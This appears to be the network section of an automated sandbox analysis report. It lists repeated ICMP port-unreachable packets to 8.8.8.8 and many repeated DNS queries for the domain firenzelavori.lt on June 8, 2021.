                        ICMP Packets

                        TimestampSource IPDest IPChecksumCodeType
                        Jun 8, 2021 21:45:54.964981079 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:45:56.099009037 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:45:57.298036098 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:45:58.656733036 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:00.751806021 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:01.754117012 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:02.956034899 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:04.041250944 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:05.052316904 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:06.495671988 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:07.523806095 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:08.667937994 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:10.878494024 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:11.909233093 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:13.112329960 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:14.141931057 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:15.412833929 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:16.459861994 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:17.552954912 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:18.558916092 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:20.849701881 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:22.067990065 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:22.966525078 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:24.303997993 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:25.381509066 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:26.549659014 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:27.582088947 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:29.147828102 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:30.159692049 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:31.392047882 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:32.534580946 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:34.568873882 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:36.930080891 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:39.055318117 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:41.273154020 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:42.322419882 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:43.383141994 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:44.412508965 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:46.192173958 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:48.177417994 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:49.217508078 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:50.474508047 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:51.461366892 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:52.631150007 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:53.835880041 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:55.850178957 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:56.895355940 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:57.928431034 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:46:59.167510033 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:00.166543007 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:01.306660891 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:02.311429024 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:03.650405884 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:04.635428905 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:05.742289066 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:06.741760969 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:09.007209063 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:10.111150026 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:11.101357937 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:12.360435963 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:13.478895903 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:15.729907990 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:16.714200020 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:18.537070990 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:21.017087936 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:23.136770010 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:24.175056934 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:25.384551048 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:26.427195072 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:27.523030996 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:28.824177027 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:29.824469090 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:30.916585922 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:33.152055025 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:34.167246103 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:35.231781960 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:36.266105890 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:37.494183064 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:38.520658016 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:39.622603893 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:41.862796068 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:44.070337057 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:45.015619040 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:46.256576061 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:47.254045010 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:48.341445923 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:49.365797997 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:50.575788021 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:52.731559992 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:53.965148926 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable
                        Jun 8, 2021 21:47:56.097589970 CEST192.168.2.48.8.8.8cff4(Port unreachable)Destination Unreachable

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Jun 8, 2021 21:45:51.877125025 CEST192.168.2.48.8.8.80xbfeeStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:45:52.904454947 CEST192.168.2.48.8.8.80xbfeeStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:45:53.949357033 CEST192.168.2.48.8.8.80xbfeeStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:45:54.131951094 CEST192.168.2.48.8.8.80xbfffStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:45:55.152808905 CEST192.168.2.48.8.8.80xbfffStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:45:55.462305069 CEST192.168.2.48.8.8.80xdba7Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:45:56.496690035 CEST192.168.2.48.8.8.80xdba7Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:45:57.594887972 CEST192.168.2.48.8.8.80xa13aStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:45:58.606086016 CEST192.168.2.48.8.8.80xa13aStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:45:59.606571913 CEST192.168.2.48.8.8.80xa13aStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:45:59.883620977 CEST192.168.2.48.8.8.80xe1e4Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:00.903748035 CEST192.168.2.48.8.8.80xe1e4Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:01.950437069 CEST192.168.2.48.8.8.80xe1e4Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:02.012041092 CEST192.168.2.48.8.8.80x2348Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:02.997443914 CEST192.168.2.48.8.8.80x2348Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:03.437616110 CEST192.168.2.48.8.8.80x3944Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:04.434828997 CEST192.168.2.48.8.8.80x3944Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:05.453898907 CEST192.168.2.48.8.8.80x3944Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:05.570528984 CEST192.168.2.48.8.8.80x7d6Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:06.612905025 CEST192.168.2.48.8.8.80x7d6Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:07.839531898 CEST192.168.2.48.8.8.80x9c1fStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:08.827095032 CEST192.168.2.48.8.8.80x9c1fStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:09.857043028 CEST192.168.2.48.8.8.80x9c1fStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:09.970566988 CEST192.168.2.48.8.8.80x70edStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:10.966896057 CEST192.168.2.48.8.8.80x70edStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:11.998529911 CEST192.168.2.48.8.8.80x70edStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:12.360927105 CEST192.168.2.48.8.8.80xbbc0Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:13.357603073 CEST192.168.2.48.8.8.80xbbc0Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:14.404340982 CEST192.168.2.48.8.8.80xbbc0Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:14.492835999 CEST192.168.2.48.8.8.80x38f9Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:15.482626915 CEST192.168.2.48.8.8.80x38f9Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:16.498698950 CEST192.168.2.48.8.8.80x38f9Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:16.765202045 CEST192.168.2.48.8.8.80x5abeStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:17.779926062 CEST192.168.2.48.8.8.80x5abeStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:18.795504093 CEST192.168.2.48.8.8.80x5abeStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:18.877701044 CEST192.168.2.48.8.8.80x87d9Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:19.904709101 CEST192.168.2.48.8.8.80x87d9Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:20.905123949 CEST192.168.2.48.8.8.80x87d9Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:21.246056080 CEST192.168.2.48.8.8.80xaa5Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:22.248971939 CEST192.168.2.48.8.8.80xaa5Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:23.330734015 CEST192.168.2.48.8.8.80xaa5Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:23.491897106 CEST192.168.2.48.8.8.80x671cStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:24.499166965 CEST192.168.2.48.8.8.80x671cStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:25.520415068 CEST192.168.2.48.8.8.80x671cStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:26.081139088 CEST192.168.2.48.8.8.80xf9ebStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:27.093158960 CEST192.168.2.48.8.8.80xf9ebStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:28.108696938 CEST192.168.2.48.8.8.80xf9ebStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:28.202702045 CEST192.168.2.48.8.8.80x465bStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:29.249587059 CEST192.168.2.48.8.8.80x465bStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:30.471527100 CEST192.168.2.48.8.8.80x6046Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:31.468352079 CEST192.168.2.48.8.8.80x6046Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:32.499547005 CEST192.168.2.48.8.8.80x6046Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:32.584973097 CEST192.168.2.48.8.8.80xe466Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:33.609155893 CEST192.168.2.48.8.8.80xe466Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:34.842267036 CEST192.168.2.48.8.8.80x1ca4Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:35.876543045 CEST192.168.2.48.8.8.80x1ca4Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:35.967943907 CEST192.168.2.48.8.8.80xb8feStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:37.000228882 CEST192.168.2.48.8.8.80xb8feStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:38.201216936 CEST192.168.2.48.8.8.80x4458Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:39.203886986 CEST192.168.2.48.8.8.80x4458Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:40.251085043 CEST192.168.2.48.8.8.80x4458Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:40.319829941 CEST192.168.2.48.8.8.80xfd45Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:41.328957081 CEST192.168.2.48.8.8.80xfd45Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:42.362428904 CEST192.168.2.48.8.8.80xfd45Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:43.006941080 CEST192.168.2.48.8.8.80xdf11Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:44.133902073 CEST192.168.2.48.8.8.80xdf11Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:45.122220993 CEST192.168.2.48.8.8.80xe24aStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:46.111083984 CEST192.168.2.48.8.8.80xe24aStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:47.157222033 CEST192.168.2.48.8.8.80xe24aStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:47.389873028 CEST192.168.2.48.8.8.80x967dStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:48.407136917 CEST192.168.2.48.8.8.80x967dStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:49.407537937 CEST192.168.2.48.8.8.80x967dStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:49.508212090 CEST192.168.2.48.8.8.80x498dStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:50.549647093 CEST192.168.2.48.8.8.80x498dStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:51.747528076 CEST192.168.2.48.8.8.80xcdd8Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:52.751557112 CEST192.168.2.48.8.8.80xcdd8Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:53.798799992 CEST192.168.2.48.8.8.80xcdd8Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:53.847084999 CEST192.168.2.48.8.8.80x92e4Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:54.845546007 CEST192.168.2.48.8.8.80x92e4Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:55.860851049 CEST192.168.2.48.8.8.80x92e4Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:56.081727028 CEST192.168.2.48.8.8.80xef23Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:57.111162901 CEST192.168.2.48.8.8.80xef23Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:58.111620903 CEST192.168.2.48.8.8.80xef23Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:58.231235981 CEST192.168.2.48.8.8.80x94f1Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:46:59.252168894 CEST192.168.2.48.8.8.80x94f1Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:00.252022982 CEST192.168.2.48.8.8.80x94f1Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:00.577198029 CEST192.168.2.48.8.8.80xa055Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:01.580754995 CEST192.168.2.48.8.8.80xa055Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:02.580833912 CEST192.168.2.48.8.8.80xa055Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:02.692893028 CEST192.168.2.48.8.8.80xa7f0Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:03.689793110 CEST192.168.2.48.8.8.80xa7f0Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:04.690243959 CEST192.168.2.48.8.8.80xa7f0Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:04.949143887 CEST192.168.2.48.8.8.80xb68eStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:05.940279007 CEST192.168.2.48.8.8.80xb68eStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:06.955763102 CEST192.168.2.48.8.8.80xb68eStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:07.054735899 CEST192.168.2.48.8.8.80x17bStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:08.049606085 CEST192.168.2.48.8.8.80x17bStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:09.050389051 CEST192.168.2.48.8.8.80x17bStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:09.295856953 CEST192.168.2.48.8.8.80x24d0Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:10.299781084 CEST192.168.2.48.8.8.80x24d0Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:10.411015987 CEST192.168.2.48.8.8.80x94d3Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:11.410487890 CEST192.168.2.48.8.8.80x94d3Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:12.409337044 CEST192.168.2.48.8.8.80x94d3Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:12.634934902 CEST192.168.2.48.8.8.80x8f0bStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:13.659801006 CEST192.168.2.48.8.8.80x8f0bStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:14.659584045 CEST192.168.2.48.8.8.80x8f0bStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:15.185108900 CEST192.168.2.48.8.8.80x366aStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:16.481981039 CEST192.168.2.48.8.8.80x366aStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:17.961178064 CEST192.168.2.48.8.8.80xd515Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:18.956878901 CEST192.168.2.48.8.8.80xd515Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:20.004018068 CEST192.168.2.48.8.8.80xd515Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:20.076462984 CEST192.168.2.48.8.8.80x6df5Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:21.066327095 CEST192.168.2.48.8.8.80x6df5Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:22.113267899 CEST192.168.2.48.8.8.80x6df5Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:22.336220980 CEST192.168.2.48.8.8.80x5d9fStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:23.332197905 CEST192.168.2.48.8.8.80x5d9fStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:24.363570929 CEST192.168.2.48.8.8.80x5d9fStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:24.449955940 CEST192.168.2.48.8.8.80x28c7Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:25.457873106 CEST192.168.2.48.8.8.80x28c7Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:25.717809916 CEST192.168.2.48.8.8.80xb6fcStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:26.754235029 CEST192.168.2.48.8.8.80xb6fcStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:27.754870892 CEST192.168.2.48.8.8.80xb6fcStandard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:27.845082045 CEST192.168.2.48.8.8.80xf0e0Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:28.863986969 CEST192.168.2.48.8.8.80xf0e0Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:30.084748030 CEST192.168.2.48.8.8.80x11f1Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:31.083328962 CEST192.168.2.48.8.8.80x11f1Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:32.114192009 CEST192.168.2.48.8.8.80x11f1Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:32.189172983 CEST192.168.2.48.8.8.80xd4a0Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:33.176843882 CEST192.168.2.48.8.8.80xd4a0Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:34.208899021 CEST192.168.2.48.8.8.80xd4a0Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:34.429323912 CEST192.168.2.48.8.8.80x6de8Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
                        Jun 8, 2021 21:47:35.443193913 CEST192.168.2.48.8.8.80x6de8Standard query (0)firenzelavori.ltA (IP address)IN (0x0001)
